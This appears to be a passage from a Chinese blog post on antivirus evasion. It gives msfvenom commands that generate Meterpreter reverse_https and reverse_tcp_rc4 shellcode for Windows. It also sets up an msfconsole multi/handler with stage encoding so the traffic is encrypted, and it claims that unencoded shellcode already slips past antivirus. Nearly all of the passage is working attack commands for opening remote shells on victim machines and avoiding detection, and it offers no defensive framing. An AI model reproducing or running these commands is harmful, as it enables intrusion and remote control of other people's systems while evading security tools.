msfvenom -p windows/x64/meterpreter/reverse_https lhost=x lport=x -f c
SH
经测试不对shellcode进行编码也可免杀。
2 配置msfconsole
1 2 3 4 5 6 7 8
msfconsole use exploit/multi/handler set paylaod windows/x64/meterpreter/reverse_https set lhost x set lport x set EnableStageEncoding true set stageencoder x64/xor_dynamic set stageencodingfallback false
SH
使用reverse_https效果较好
其中
1 2 3
set EnableStageEncoding true set stageencoder x64/xor_dynamic set stageencodingfallback false
SH
是对流量进行加密,也可使用reverse_tcp_rc4而且不用设置stageencoder选项。
1
msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 lhost=x lport=x RC4PASSWORD=pswd -f c